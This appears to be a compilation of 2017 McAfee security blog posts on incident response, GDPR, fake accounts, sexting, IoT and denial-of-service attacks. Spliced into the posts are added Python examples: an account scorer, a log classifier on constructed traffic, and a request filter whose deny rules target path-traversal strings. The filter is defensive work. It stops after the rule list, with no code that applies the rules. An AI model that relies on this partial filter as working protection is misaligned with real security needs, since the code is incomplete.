Communicate and train on the plan. Once your plan has been developed, reviewed and approved, the roles and responsibilities everyone plays should be disseminated to all relevant parties. An incident can be detected by anyone with the right “visibility.” Your IT team is obviously on the front lines for incident detection and response, but many people in your organization could end up identifying a problem first. Maybe your marketing team, who owns the website, notices some highly suspect traffic one day or encounters issues with the server. Do they know where to go? Any of your end users could click on a link in an email and realize afterwards that it seemed suspicious. Do they know who to call or email?

A hands-on and interactive way to ensure that key stakeholders know what role they play in incident response is to conduct tabletop exercises. A tabletop exercise is usually led by a security subject matter expert who walks a team of diverse stakeholders (from IT, security, management, legal, HR, etc.) through an impactful security incident scenario, facilitating the decisions made and providing feedback afterwards on how well the participants were aware of their responsibilities and the company’s policies. Tabletop exercises are one way of doing “red teaming” because they simulate how internal processes will play out if a real security incident gets reported and escalated.

Proactively mitigate your losses. A security incident that turns into a validated security breach can lead to devastating financial or reputational loss. Such losses are not easy to recover from, and in some scenarios, organizations never fully rebound. The Anthem Healthcare breach of 2015 came with a price tag well into the billions of dollars. And the code-hosting service, Code Spaces, went under in the months following its breach.

In addition to putting preventative best-practice technical measures in place and preparing an actionable incident response plan, consider building relationships and lines of communication now with relevant government agencies, external legal counsel and digital forensics firms, and potentially procuring cybersecurity liability insurance. Your Board of Directors will, and should, expect you to have answers on all of these measures, and communicating with your Board on these matters is an art unto itself.

In a world where it isn’t a question of “if” but “when” your company may find itself the target of a cyber incident, a detailed incident response plan will be your lifeline to weathering the storm of security incidents in measurable ways. Executed well, it can help you demystify the what-if scenarios, decrease your panic about who will do what, and plan through the worst-case scenarios to make sure you have all the experts and resources you need to handle any security incident.

This article was written by Christie Terrill from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Preparing for GDPR in 2017, Part 3: Top Questions to Ask Your Cloud Providers
https://securingtomorrow.mcafee.com/business/safeguard-data/preparing-gdpr-2017-part-3-top-questions-ask-cloud-providers/
Tue, 06 Jun 2017 16:00:01 +0000

This is the third in a series of blog posts designed to help enterprise security and business executives prepare for GDPR throughout 2017. (Part 1, 2, 4)

Thinking about moving applications to the cloud? If you are – and what business isn’t – have you considered the impact of the EU General Data Protection Regulation (GDPR) on those plans?

At McAfee, we believe GDPR is an opportunity for security transformation – an opportunity to break a compliance-driven security approach and move to a secure- and privacy-by-design strategy.

The GDPR breaks from previous compliance schemes and, instead of dictating a checklist of security technology controls, requires organisations to develop long-lasting capabilities. As such, it presents an opportunity to review your comprehensive data and security strategy and build resilience rather than checklists. We believe that GDPR presents an opportunity for security to be seen as an enabler for business, and particularly an enabler to securely adopt cloud services.

Whether you are moving legacy applications to public cloud, adopting cloud storage, or consuming cloud-delivered business applications such as Office 365, you must consider the impact of GDPR specifically, and an opportunity to review or develop a cloud security strategy more broadly.

At McAfee, we want your business to say yes to cloud adoption, so here are some of the top questions and considerations for you to have an informed conversation with your cloud service provider about GDPR and overall security readiness:

Does your cloud service provider have a privacy policy?

Having strong and transparent security policies is the first step. In many cases, GDPR requires the appointment of a Data Protection Officer (DPO) to oversee the programme. Also ask to have a conversation with the DPO at your cloud provider.

How do you use the data collected?

Providers have a responsibility to disclose to you how they use, if appropriate, the data collected by their service as well as how they protect the information. Many organisations use collected data for analytics or other legitimate purposes. However, those processes should not create additional risk for you.

What security frameworks, standards or certifications do you follow or have you achieved for your service?

Several industry guides and processes exist that provide a standardised set of requirements and controls for protecting cloud services. FedRAMP, for example, is a comprehensive process to authorise cloud services for the US government but the process is based on NIST and could be adopted more broadly. Internationally there is ISO27002, for which the Cloud Security Alliance provides additional guides. Cloud providers should use one of the available frameworks to assess and continuously monitor maturity.

Can you identify a data breach and respond?

Statistically, over half of all data breaches are detected by external organisations. Given that GDPR requires 72-hour notification to the relevant supervisory authority from when you, the organisation, became aware of it, it’s critical to possess the capability to identify potential data breaches and have a rehearsed process with which to respond. Ask your cloud provider if it has an SOC or a CSIRT, either in house or as a managed service, with those abilities.

Where do you store and process the data that is collected?

Data residency is probably the number one concern when it comes to cloud services and preparation for the GDPR. Does your cloud provider have data centres in the EU or only in the US? Where does it store and process data? Is data moved from the EU to the US? These are just some of the concerns in this area but they can be resolved with proper data-at-rest encryption, access control and key management.

The above are all considerations for the GDPR and cloud service providers, although they are not an exhaustive list. Hopefully this will help make you a more informed consumer of these services and start you on the way towards GDPR readiness. More importantly, these approaches will make for a safer business journey to the cloud.

Preparing for the GDPR in 2017, Part 3: Key Questions to Ask Your Cloud Service Provider
https://securingtomorrow.mcafee.com/languages/francais/se-preparer-au-rgpd-en-2017-troisieme-partie-principales-questions-poser-votre-fournisseur-de-services-de-cloud/
Tue, 06 Jun 2017 15:37:15 +0000

This blog post is the third in a series intended to help business leaders and security executives prepare for the GDPR throughout 2017.

Is your company planning to move applications to the cloud? If so, it is far from alone. But have you thought about the impact the European Union’s General Data Protection Regulation (GDPR) will have on that project?

McAfee sees the GDPR as an opportunity to transform security: a chance to move away from a security approach focused purely on compliance and adopt a strategy that emphasises privacy and security by design.

The new regulation breaks with earlier compliance paradigms and, rather than dictating which security technologies to deploy, requires companies to develop lasting capabilities. No more long checklists. This is the ideal moment to re-examine your entire data protection and security strategy to strengthen its resilience. We are convinced that the GDPR will help transform the way IT security is perceived: it should come to be seen as a driver of business growth and, above all, as essential to adopting cloud services securely.

It does not matter whether you are migrating legacy applications to the public cloud, adopting a cloud storage solution or opting for pay-per-use business applications delivered as cloud services, such as Office 365. You need to think about the impact the GDPR will have and use the opportunity to broaden your cloud security strategy.

McAfee wants your company to open its doors to the cloud without fear. To help, here are some important questions and points to keep in mind when you talk to your cloud service provider, so that you can address GDPR readiness and security in general on an informed basis:

Does your cloud service provider have a privacy policy?

Putting reliable and transparent security policies in place is the first step. In many cases the GDPR requires the appointment of a Data Protection Officer to oversee the programme. Also ask to speak with your cloud service provider’s Data Protection Officer.

How do you use the data you collect?

Providers are required to tell you how (if at all) they use the data their services collect, and what measures they take to protect that data. Collected data is often used for analytics or other legitimate purposes. Those processes must not, however, expose you to additional risk.

Which security frameworks, standards or certifications have you chosen to adopt, or with which are your services compliant?

Several industry guides and procedural frameworks set out a standardised series of requirements and controls for protecting cloud services. FedRAMP, for example, is a comprehensive programme for authorising cloud services for the US government. It is based on NIST publications, however, and its adoption could become more widespread. Internationally there is the ISO 27002 standard, for which the CSA (Cloud Security Alliance) provides additional guides. Cloud service providers should rely on one of the available frameworks to assess and continuously monitor their level of maturity.

Are you able to detect a data breach and respond effectively?

Statistically, more than half of data breaches are detected by a third party. The GDPR requires the company that suffers such an incident (yours, in this case) to report it to the competent supervisory authority no later than 72 hours after becoming aware of it. It is therefore essential to be able to detect potential data breaches and to have a response plan proven through simulations. Ask your cloud service provider whether it can deliver these functions through a SOC or CSIRT, whether operated in house or accessed as a managed service.

Where do you store and process the data you collect?

Where the data resides is probably the main concern when it comes to cloud services and GDPR preparation. Does your cloud service provider have data centres in the European Union, or only in the United States? Where does it store and process its data? Is it moved from the EU to the United States? These questions can be answered by putting appropriate measures in place for encryption of data at rest, access control and key management.

Although the list of questions above is not exhaustive, it sums up the points to consider when discussing the GDPR with a cloud service provider. Hopefully this reading will help you make better-informed decisions as a user of these services and set you on the path to GDPR readiness. More importantly, this advice will surely allow you to migrate to the cloud securely.

Curbing The Threat Of Fake Accounts
https://securingtomorrow.mcafee.com/consumer/curbing-threat-fake-accounts/
Tue, 06 Jun 2017 15:24:14 +0000

My bubbly teen was so excited the day she found Priyanka Chopra had started following her on Twitter. She was literally hopping around the room, squealing in delight. As a parent and my daughter’s cybersafety guide, I checked her page to confirm, and what I saw made me sad, but I had to burst her bubble.

“No darling, that’s not the real Priyanka Chopra following you but a fake Twitter account. See here, @priyankachopra, this is her original handle. And see this blue tick – it means Twitter has validated this account to be a genuine one, as it usually verifies popular accounts.”

“Why do people create fake accounts then?” ranted the peeved teen, as she angrily blocked the fake handle. (It’s painful to lose a celeb follower on social media you know.)

Why indeed? Why do people create false accounts on social media sites like Twitter, Instagram, LinkedIn and Facebook? For the same reason why we have fakes/imitations in the real world; someone stands to gain from it, or leverage it to make mischief.

Are the number of fake accounts significant enough to warrant attention and action? It apparently is. According to a research carried out by a graduate student at UCL recently, there are more than 500,000 fake accounts on Twitter alone, for instance, Deepika Padukone’s account (@Deepika_Officia). Fake LinkedIn accounts of company CEOs is a common way to fraud job seekers signing up on the site. Another big fake account source is the duplication of celebrity accounts and hapless fans often end up following the fake account online. These can do major harm by sharing false or inappropriate content. Fake accounts are also created to boost follower counts, share incendiary or dishonest messages, create trending topics, send spam, troll and abuse users, launch scam or phishing attacks or set traps for naïve children.

Fake account creators bank on the trusting nature of users, which leads them to believe in the authenticity of an account. They leverage this trust to swindle, bully or defame the person or others. So the thing to do is to be skeptical and vigilant.

Identifying fake accounts on social media:

This is not an easy task by any means, but still we need to be vigilant to avoid risks. Here are a few pointers that will help you stay safer online:

  • Absent: the account does not engage much in real-time conversations.
  • Mechanical: repeats a single message and tags several accounts at random.
  • Agenda: consistently shares false, inappropriate or suspicious content. Sometimes engages in trolling or bullying and, apart from that, shares no tangible storyline or views.
  • Inadequate identity: a Twitter handle without a profile image.
  • Impostors: new friend requests from existing friends, not to mention suspicious favors asked online.

The moment you come across a duplicate or fake account, flag and report it. That way the site knows of its existence and can take remedial action. And never be in a hurry to accept friend or follow requests. Take your time: check the account profile, posts and friend list, then decide. Do not trust blindly; each new friend or follower needs to earn your trust before you interact with the account. Remember to be a true Doubting Thomas when online. STOP. THINK. CONNECT.
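The pointers above can be turned into a rough triage score. What follows is an added example, not part of the original post: it applies those heuristics (no profile image, one message repeated, many random tags, no conversation) to constructed account records. The account data, the weights and the "likely fake" threshold are assumptions chosen for illustration, not Twitter's or anyone else's detection logic; the only real handle used is @priyankachopra, named in the post.

```python
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Account:
    """Constructed snapshot of a social-media account (illustrative fields, not a real API)."""
    handle: str
    verified: bool
    has_profile_image: bool
    posts: List[str]
    replies_received: int                               # how often others actually talk back
    mentions: List[str] = field(default_factory=list)   # handles this account tagged in its posts


def repetition_ratio(posts: List[str]) -> float:
    """Share of posts that are the same message (1.0 = every post identical)."""
    if not posts:
        return 0.0
    counts = Counter(p.strip().lower() for p in posts)
    return counts.most_common(1)[0][1] / len(posts)


def mention_spread(mentions: List[str]) -> float:
    """Share of tagged handles that are distinct; close to 1.0 over many tags means 'tags accounts at random'."""
    if not mentions:
        return 0.0
    return len(set(mentions)) / len(mentions)


def score(acct: Account) -> Dict:
    """Assumed weights: 2 points for bot-like posting behaviour, 1 point for weak identity or silence."""
    if acct.verified:
        return {"handle": acct.handle, "score": 0, "likely_fake": False, "reasons": ["platform-verified"]}
    points, reasons = 0, []
    if not acct.has_profile_image:
        points += 1
        reasons.append("no profile image")
    rep = repetition_ratio(acct.posts)
    if len(acct.posts) >= 4 and rep >= 0.5:
        points += 2
        reasons.append(f"repeats one message ({rep:.0%} of posts)")
    if len(acct.mentions) >= 10 and mention_spread(acct.mentions) >= 0.9:
        points += 2
        reasons.append("tags many unrelated accounts")
    if acct.posts and acct.replies_received == 0:
        points += 1
        reasons.append("never engages in conversation")
    return {"handle": acct.handle, "score": points, "likely_fake": points >= 3, "reasons": reasons}


def triage(accounts: List[Account]) -> List[Dict]:
    """Rank accounts so the ones worth reporting come first."""
    return sorted((score(a) for a in accounts), key=lambda r: r["score"], reverse=True)


# Constructed sample accounts (fictional data; the impostor handle is made up for the example).
SAMPLE_ACCOUNTS = [
    Account("priyankachopra", verified=True, has_profile_image=True,
            posts=["On set today!", "Thank you all", "New project announced"],
            replies_received=4200, mentions=["a_fan"]),
    Account("priyankachopra_real", verified=False, has_profile_image=False,
            posts=["Follow me for a free gift card!"] * 5 + ["Follow me for a free gift card!!"],
            replies_received=0, mentions=[f"random_user_{i}" for i in range(12)]),
    Account("teen_fan_101", verified=False, has_profile_image=True,
            posts=["omg she followed me", "lol", "anyone seen the new trailer?"],
            replies_received=7, mentions=["bestie", "bestie"]),
]

if __name__ == "__main__":
    for result in triage(SAMPLE_ACCOUNTS):
        print(result)
```

The verified badge short-circuits everything else, which mirrors the advice in the post: the platform's own check beats any heuristic, and the heuristics are only for accounts that lack it.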

Helping Kids Understand the Foolishness and Consequences of Sexting https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-understand-foolishness-consequences-sexting/ https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-understand-foolishness-consequences-sexting/#respond Tue, 06 Jun 2017 14:00:49 +0000 https://securingtomorrow.mcafee.com/?p=74655 Sexting and teens. Nearly every week, the headlines reflect the attempt of citizens, educators, and lawmakers to tackle the question: What should the punishment be for teens caught sexting? In most states, officials may prosecute anyone, regardless of age, who creates, distributes or possesses an image of a minor engaged in sexual acts under that state’s …

The post Helping Kids Understand the Foolishness and Consequences of Sexting appeared first on McAfee Blogs.

Sexting and teens. Nearly every week, the headlines reflect the attempt of citizens, educators, and lawmakers to tackle the question: What should the punishment be for teens caught sexting?

In most states, officials may prosecute anyone, regardless of age, who creates, distributes or possesses an image of a minor engaged in sexual acts under that state’s pornography laws. And, if convicted, that person is required to register as a sex offender. Currently, laws vary state to state (check your state’s laws here).

However, as sexting becomes more socially widespread among teens — some even calling it an “epidemic,” — many consider the felony charge of trafficking child pornography too stiff a penalty for minors, especially in cases where sexting is consensual.

Such was the case in Illinois when officials charged two students with possession of child pornography following a sexting scandal at a suburban middle school. More recently, a group of Kentucky teens was accused of circulating more than 140 nude photos of teens in their peer group.

Chances are the middle and high school students charged weren’t thinking about prison time when they hit “send” on their phones and became part of a crime. Lawmakers in states across the country, such as Colorado and Tennessee, want sexting offenses treated as misdemeanors or infractions, on a par with skipping school or violating curfew.

The dialogue around the issue is robust, for sure, because sexting can be wanted or unwanted. Concerns about sex trafficking, cyberbullying and the privacy rights of minors face off against passionate citizen groups and lawmakers who argue that the sexting lesson needs to be taught, but not through the criminal justice system.

While each state wrestles with how to reshape its laws, the conversation around the family dinner table is more important than ever. Don’t wait for something to happen before bringing up sexting. Talk candidly and firmly to your kids about the proper and legal use of their phones.

Sexting: Family Talking Points

1. Nothing is private. Nothing. Once you send an intimate photo, you’ve lost control over it, and you never know where it’s going to end up. Just. Don’t. Do. It.

2. It’s a felony. Underaged sexting — as common and acceptable as teens claim it to be — is still a crime. Felony charges and sex offender status for possessing and sharing photos of underaged males or females is still a possibility.

3. Responsibility. With great power comes great responsibility. Poor decisions on social media can have broad, far-reaching consequences as comedian Kathy Griffin recently reminded us all. Kids who own mobile phones must exhibit responsible behavior and understand the consequences of misusing technology. Encourage kids to delete any inappropriate photos they receive immediately.

4. Revenge is real. When feelings of rejection, betrayal, or jealousy mix with teen angst and technology, the results can be devastating. Revenge porn — when someone shares once private photos out of anger — is a very real consequence of sexting. Talk to kids about the risks and that even the most trusted relationships can take unexpected turns. The best practice: Never sext. Ever.

5. Empathize. Kids sext for different reasons; some to show off or joke around, others to win someone’s affection or to prove their commitment. Listen to your child and empathize with the social pressure he or she faces daily. Let your child know that everyone wants to be accepted, but real friends don’t require intimate photos to build a relationship. Discuss different ways to respond to that pressure that will help them steer clear of sexting.

6. Extend grace. Everyone makes mistakes — it’s part of growing up. Let your kids know that if they’ve been on either side of the sexting equation, they can make it right by deleting all photos and committing to never doing it again. Familiarize yourself with signs your teen may be sexting and the texting slang used to do it. Encourage your child to find his or her worth outside of what peers may be doing.

7. Think big picture. It’s easy for kids to get caught up in the moment and make impulsive decisions. Talk to kids about the big picture. Ask: What if one hasty decision came back to haunt you years down the road? What if one decision cost you a scholarship, a relationship, or even a job? What if the person you send a photo to loses his or her phone? What if a friend, parent, or teacher scrolls through your friend’s phone and sees the intimate picture? What if a “trusted” friend or relationship changes? Watch the sexting and cyberbullying video, “Exposed” and discuss.

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @IntelSec_Family. (Disclosures).

A lack of IoT security is scaring the heck out of everybody https://securingtomorrow.mcafee.com/business/optimize-operations/a-lack-of-iot-security-is-scaring-the-heck-out-of-everybody/ Mon, 05 Jun 2017 20:00:18 +0000 https://securingtomorrow.mcafee.com/?p=74765 Enterprises aren’t yet managing the risks posed by the swelling wave of IoT technology very well, according to a study released by the Ponemon Institute. The study, which surveyed 553 enterprise IT decision-makers, found that 78% of respondents thought that it was at least somewhat likely that their organizations would experience data loss or theft …

The post A lack of IoT security is scaring the heck out of everybody appeared first on McAfee Blogs.

Enterprises aren’t yet managing the risks posed by the swelling wave of IoT technology very well, according to a study released by the Ponemon Institute.

The study, which surveyed 553 enterprise IT decision-makers, found that 78% of respondents thought that it was at least somewhat likely that their organizations would experience data loss or theft enabled by IoT devices within the next two years.

The fact that a lot of small-scale connected devices and other parts of the Internet of Things are highly insecure has been frightening IT departments for a long time. On their own, IoT gadgets aren’t particularly tempting targets, so manufacturers don’t fuss too much about security. In great numbers – and Gartner said recently that it estimates there are 8.4 billion connected devices active this year – swathes of easily compromised IoT gizmos can make for a formidable botnet, as the Mirai botnet showed in 2016.

Yet, in a lot of places, it can be difficult to put policies in place to neutralize this threat. Nearly three respondents in four – 72% – said that the speed at which IoT technology advances makes it harder to keep up with evolving security requirements. Almost as many said that new strategies are needed to cope with the problem.

Those strategies are difficult to design, according to the Ponemon study. Just 44% of respondents told researchers that their enterprise has the ability to protect itself and its network from IoT devices. Less than half said that they specifically monitor the risk posed by devices being used in the workplace.

Another big factor in the generally poor state of IoT management is organization – of the 50% or so of companies that didn’t track IoT inventory, fully 85% said that there is a lack of centralized responsibility for those devices, and over half cited a lack of resources available to perform this task.

Nevertheless, respondents at least recognize the need for a new way of thinking about IoT management – two-thirds said that “a new approach” is necessary for IT departments coping with IoT.

This article was written by Jon Gold from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Denial Of Service Is A Growing Threat: How Can You Better Protect Your Business? https://securingtomorrow.mcafee.com/business/neutralize-threats/denial-of-service-is-a-growing-threat-how-can-you-better-protect-your-business/ Fri, 02 Jun 2017 19:46:29 +0000 https://securingtomorrow.mcafee.com/?p=74753 Earlier this month, I wrote on the changing face of cybersecurity, and last week I wrote a blog on recent high-profile security attacks, and what lessons we can take away from them. Today, as part of our ongoing series on security, I wanted to take a deeper dive into the different kinds of Denial of …

The post Denial Of Service Is A Growing Threat: How Can You Better Protect Your Business? appeared first on McAfee Blogs.

Earlier this month, I wrote on the changing face of cybersecurity, and last week I wrote a blog on recent high-profile security attacks, and what lessons we can take away from them. Today, as part of our ongoing series on security, I wanted to take a deeper dive into the different kinds of Denial of Service attacks (DoS), and what enterprises need to do in order to better secure themselves from this growing threat. We’ve touched on the topic a few times in the last several blogs, but there’s a fair amount more to chew on here.

Three kinds of DoS – classic, DDoS, PDoS

First off, there are three main variations on DoS attacks, all of which are distinct from traditional data theft or information loss (though those may happen as a result of a DoS). While the industry disagrees a bit about the proper acronyms, the underlying concepts are widely agreed upon; here’s the rundown, using the nomenclature we typically use at Moor Insights & Strategy. First, the classic Denial of Service attack, referred to simply as DoS: a server is made inaccessible, either by overloading it with traffic or by compromising its firmware. A slight twist is that a server with compromised firmware can technically still be available while being used at the same time by an attacker for criminal purposes. This is a particularly sinister threat, because users might not immediately realize that they’ve been compromised.

Next up is the Distributed Denial of Service, or DDoS. This form of DoS occurs when a server is attacked from many different locations at once, making it very difficult to pinpoint where the attack is coming from or to block it at the source. You’ve probably been hearing a lot about this one: the recent gigantic Mirai-Dyn attack falls under this category. In that case, the Mirai bot targeted unsecured IoT devices with default credentials and out-of-date firmware, assembled them into a huge botnet, and used it to flood Dyn with traffic. This was one of those attacks that we in the industry see as a harbinger of things to come: with the proliferation of IoT and edge devices, the threat surface is growing and becoming increasingly vulnerable to attacks of this nature.

The third, and final form of DoS is what we call Permanent Denial of Service, or PDoS. This occurs when a server or device is compromised (often at the firmware level), to the extent that it becomes impossible to recover. No way to revive it back into operation, just plain dead. Referred to colloquially as a “brick,” these sorts of serious attacks are on the rise. In an interesting twist, there’s a new malware strain that’s popped up that seems to be intentionally “bricking” unsecured IoT devices – seemingly to take them off the table to prevent the spread of Mirai-like malware. It may be the work of a well-intentioned vigilante, but it’s still PDoS and a huge headache for those who are being permanently iced out from their devices.
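Telling the first two forms apart in practice comes down to traffic shape, which is visible in ordinary server logs. The following is an added example, not from the original article: it parses constructed web-server access-log lines in the common log format and, per ten-second window, flags a classic DoS when a single source exceeds a per-source limit and a DDoS when the aggregate rate is high but no single source stands out. The log lines, the window size and the thresholds are assumptions chosen for illustration; a PDoS leaves no such trail in request logs and is not covered.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Common access-log line, e.g.: 203.0.113.7 - - [02/Jun/2017:12:00:10 +0000] "GET /login HTTP/1.1" 503 512
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None  # skip lines that do not fit the format
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "request": m["req"], "status": int(m["status"])}


def classify(lines: List[str], window_seconds: int = 10, per_source_limit: int = 50,
             aggregate_limit: int = 200, min_sources: int = 20) -> List[Dict]:
    """Bucket requests into fixed windows and label each window normal / dos / ddos (assumed thresholds)."""
    events = [e for e in map(parse_line, lines) if e]
    if not events:
        return []
    events.sort(key=lambda e: e["ts"])
    t0 = events[0]["ts"]
    buckets: Dict[int, Counter] = defaultdict(Counter)
    for e in events:
        idx = int((e["ts"] - t0).total_seconds() // window_seconds)
        buckets[idx][e["ip"]] += 1
    findings = []
    for idx in sorted(buckets):
        per_ip = buckets[idx]
        total = sum(per_ip.values())
        offenders = sorted(ip for ip, n in per_ip.items() if n > per_source_limit)
        if offenders:                                                   # one source doing the damage
            verdict = "dos"
        elif total > aggregate_limit and len(per_ip) >= min_sources:    # many low-rate sources
            verdict = "ddos"
        else:
            verdict = "normal"
        findings.append({"window": idx, "verdict": verdict, "requests": total,
                         "sources": len(per_ip), "offenders": offenders})
    return findings


def make_sample_log() -> List[str]:
    """Constructed traffic (not real data): a quiet window, a single-source flood, then a distributed flood."""
    base = datetime(2017, 6, 2, 12, 0, 0, tzinfo=timezone.utc)
    lines = []

    def emit(ip, ts, path="/", status=200):
        lines.append(f'{ip} - - [{ts.strftime(TS_FMT)}] "GET {path} HTTP/1.1" {status} 512')

    for i in range(5):                       # window 0: five visitors, three requests each
        for j in range(3):
            emit(f"198.51.100.{i + 1}", base + timedelta(seconds=j))
    for j in range(120):                     # window 1: one source hammering /login
        emit("203.0.113.7", base + timedelta(seconds=10, milliseconds=50 * j), "/login", 503)
    for i in range(40):                      # window 2: forty sources, six requests each
        for j in range(6):
            emit(f"192.0.2.{i + 1}", base + timedelta(seconds=20 + j))
    return lines


def verdicts(lines: List[str]) -> List[str]:
    return [f["verdict"] for f in classify(lines)]


if __name__ == "__main__":
    for finding in classify(make_sample_log()):
        print(finding)
```

The two verdicts call for different responses: a per-source offender can be rate-limited or blocked at the edge, while the distributed case has no single address to block and needs upstream scrubbing or capacity, which is exactly why the DDoS form is the harder one.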

What can you do to better protect yourself?

As we’ve discussed before, security is a constantly moving target and the players, techniques and remedies change over and over. Compute clients and networks were the soft spot five years ago but now it’s the server. Hackers go after the soft spots.

First the obvious – businesses need to make sure their firmware is up to date, and make sure all the default passwords on their devices have been changed. These common blind spots are known to cyber-criminals, and they will be taken advantage of. But as I’ve written before, security measures must go deeper than that – they have to be incorporated into the blueprint of their products, down to the hardware and firmware. For an enterprise to truly be secure, it needs to beef up measures on all fronts – hardware must be strengthened, AI should be leveraged to quickly and more effectively detect anomalies, and encryption must be extended to the component level. If an enterprise’s security strategy is not holistic, it’s not a matter of if a cybercriminal will breach its defenses, but when. These measures will do much to protect enterprises from DoS attacks, as well as more traditional threats. 

Last but not least, security must be extended to partners and the supply chain. This is an area that is often overlooked from a security standpoint and vulnerable. Access to firmware must be strictly controlled every step of the way. Enterprises have to properly vet and verify the companies they do business with to make sure that they are not exposed to malware and counterfeit materials at any juncture. Even Apple reportedly, according to Ars Technica, fell victim to an attacker on the supply chain level – a fake firmware patch made its way in via Supermicro, a server supplier (which you can read about here). Even the biggest, most secure companies are struggling with this blind spot, and that has to change.

Wrapping up

DoS attacks are ramping up, and it’s important to know what they are and how they could potentially affect your enterprise. They can kill productivity and cause massive downtime, such as the Mirai-Dyn incident, or they can open the door to data theft and information loss and even ruin your hardware. Right now it’s a hacker’s playground out there, with unsecured devices popping up left and right and most enterprises still struggling to devise effective, holistic security strategies to address the expanding threat surface and changing characteristics. This is a problem that’s only going to get worse unless the right measures are taken, and soon.

Disclosure: My firm, Moor Insights & Strategy, like all research and analyst firms, provides or has provided research, analysis, advising, and/or consulting to many high-tech companies in the industry, which may be cited in this article. I do not hold any equity positions with any companies cited in this column.

Note: Moor Insights & Strategy technical writer Walker Pickens contributed to this article.

This article was written by Patrick Moorhead from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/ https://securingtomorrow.mcafee.com/business/new-report-quantifies-times-impact-costs-data-breaches-disruption-attacks/#respond Fri, 02 Jun 2017 04:00:41 +0000 https://securingtomorrow.mcafee.com/?p=74711 New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time. According to the McAfee commissioned report by Aberdeen, …

The post New Report Quantifies Time’s Impact on Costs of Data Breaches and Disruption Attacks appeared first on McAfee Blogs.

New analysis from the Aberdeen Group, based on data provided by Verizon, provides fresh evidence quantifying the cost of time in two different incident types: data compromises and sustained disruption in service availability. These findings underscore the urgency for cybersecurity practitioners to minimize detection and containment time.

According to the McAfee commissioned report by Aberdeen, Cybersecurity: For Defenders, It’s About Time, the business impact from a data breach is the greatest at the beginning of the exploit, when records are first compromised. That’s logical, since attackers want to get in and out with the goods (your data) in as little time as possible. Most responders are closing the barn door well after the horse has gone, when most of the damage has already been done.

However, in contrast, the business impact from a sustained disruption in availability continues to grow from the time of compromise to the time of remediation. As illustrated below, a 2X improvement in your time to detect and respond to an attack translates to a roughly 70 percent lower business impact.

Aberdeen Group concludes that time to detection remains a top challenge for defenders responding to cyberattacks, putting enterprises at risk. The report notes that across more than 1,300 data breaches investigated between 2014 and 2016, the median time to detection was 38 days, while the mean was 210 days, skewed by some incidents that took as long as four years to detect.

This data shows that cybersecurity practitioners can improve their ability to protect business value if they can implement strategies that prioritize faster detection, investigation, and response to incidents.

Recommendations

In the study, Aberdeen Group provides four illustrative examples of how recapturing an advantage of time can help defenders to reduce their risk, with suggestions on countermeasures and counterstrategies. Some highlights include use of the latest identification and containment technologies:

  • Before zero-day: identification (e.g., through reputation, heuristics, and machine learning). Attackers have become increasingly adept at morphing the footprint of their malicious code to evade traditional signature-based defenses. But advanced pre-execution analysis of code features, combined with real-time analysis of code behaviors, is now being used to identify previously unknown malware without signatures, before it has the opportunity to execute.
  • After identification: containment (e.g., through dynamic application protection, and aggregated intelligence into active threat campaigns). Advanced endpoint defense capabilities now allow potentially malicious code to load into memory but block it from making system changes, spreading to other systems, or performing other typically malicious behaviors. This approach provides immediate protection and buys additional time for intelligence gathering and analysis, without disrupting user productivity.

For data center and cloud security, some of the above endpoint tactics can be applied to server and virtual workloads to protect against both known and unknown exploits. Aberdeen Group also suggests you can improve your results through shielding and virtual patching tactics. This concept has been around for years, but is especially helpful when assets are centralized.

  • Virtual patching (sometimes known as external patching or vulnerability shielding) establishes a policy that is external to the resources being protected, to identify and intercept exploits of vulnerabilities before they reach their intended target. Direct modifications to the protected resource are not required, and updates can be automated and ongoing.
  • Strategic enforcement points: design around fewer policy enforcement points (i.e., at selected points in the enterprise network) rather than taking the time to apply vendor patches on every system.
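What such an external enforcement point looks like in code, as an added example that is not from the Aberdeen report or from any McAfee product: a small request filter of the kind a reverse proxy or web application firewall runs in front of an application that has not yet been patched. The rules, the hypothetical /api/report endpoint that should only ever receive a numeric id, and the constructed requests are all assumptions for illustration. The point is that the checks live outside the application, so they can be added or tightened without touching it.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit


@dataclass
class Request:
    """Minimal HTTP request model for the filter (constructed for the example)."""
    method: str
    url: str
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


@dataclass
class Rule:
    name: str
    match: Callable[[Request], bool]   # True means 'block before it reaches the application'


def path_traversal(req: Request) -> bool:
    """Decode twice so '..%252F' and '..%2F' are caught as well as a literal '../'."""
    path = unquote(unquote(urlsplit(req.url).path))
    return "../" in path or "..\\" in path


def unexpected_method(req: Request, allowed=("GET", "POST", "HEAD")) -> bool:
    return req.method.upper() not in allowed


def oversized_header(req: Request, limit: int = 8192) -> bool:
    return any(len(v) > limit for v in req.headers.values())


def numeric_id_only(req: Request) -> bool:
    """Input shield for a hypothetical endpoint that must only ever see a numeric 'id' parameter."""
    if urlsplit(req.url).path != "/api/report":
        return False
    return any(not v.isdigit() for v in parse_qs(urlsplit(req.url).query).get("id", []))


RULES: List[Rule] = [
    Rule("path-traversal", path_traversal),
    Rule("method-not-allowed", unexpected_method),
    Rule("oversized-header", oversized_header),
    Rule("input-shield", numeric_id_only),
]


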